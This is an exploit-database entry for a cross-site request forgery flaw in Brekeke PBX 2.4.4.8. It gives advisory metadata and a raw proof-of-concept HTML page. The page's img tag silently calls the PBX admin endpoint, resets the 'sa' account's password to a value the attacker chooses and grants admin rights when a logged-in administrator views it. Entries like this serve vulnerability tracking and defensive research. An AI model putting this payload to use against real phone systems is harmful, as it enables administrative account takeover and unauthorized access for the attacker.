header-logo
Suggest Exploit
vendor:
Brekeke PBX
by:
Unknown
5.5
CVSS
MEDIUM
Cross-Site Request Forgery
352
CWE
Product Name: Brekeke PBX
Affected Version From: 2.4.4.8
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:brekeke:brekeke_pbx:2.4.4.8
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Cross-Site Request Forgery in Brekeke PBX

The vulnerability allows a remote attacker to perform administrative actions and gain unauthorized access to the affected application.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40407/info

Brekeke PBX is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.

Brekeke PBX 2.4.4.8 is vulnerable; other versions may be affected. 

<html> <body> <img src="http://www.example.com:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" /> </body> </html>